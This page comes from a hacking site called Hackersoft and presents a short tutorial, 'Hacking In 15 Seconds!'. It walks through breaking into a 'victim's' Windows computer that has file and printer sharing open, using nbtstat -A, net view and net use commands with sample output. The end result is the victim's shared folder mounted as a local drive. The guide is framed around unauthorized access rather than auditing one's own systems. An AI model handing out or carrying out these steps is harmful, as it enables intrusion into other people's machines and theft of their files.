Wednesday, 2024/12/11, 7:53 PM


Main
Registration
Login
Hackersoft Welcome Guest | RSS  
Site menu

Our poll
Rate my site
Total of answers: 11048

Statistics

Total online: 1
Guests: 1
Users: 0

Hacking In 15 Seconds!

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt

Code:


Nbtstat -A <IP address>



[e.g: nbtstat -A 207.175.1.1]



This will give you a read out that looks like this

Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________


The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Code:
Net view \\<insert ip_address here>

[e.g : net view \\207.175.1.1]



You will then get a response that looks something like this.
Code:

Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________

(The command was completed successfully.)



Code:
Net use x: \\<insert IP address here>\temp

[e.g : net use x: \\207.175.1.1\temp]


If all goes well for you, you will then get a response of

Code:
(The command was completed successfully.)

Open my computer you will see your victim's temp folder there
Sign in

Calendar
«  December 2024  »
SuMoTuWeThFrSa
1234567
891011121314
15161718192021
22232425262728
293031

IP

Copyright Hackerssoft © 2024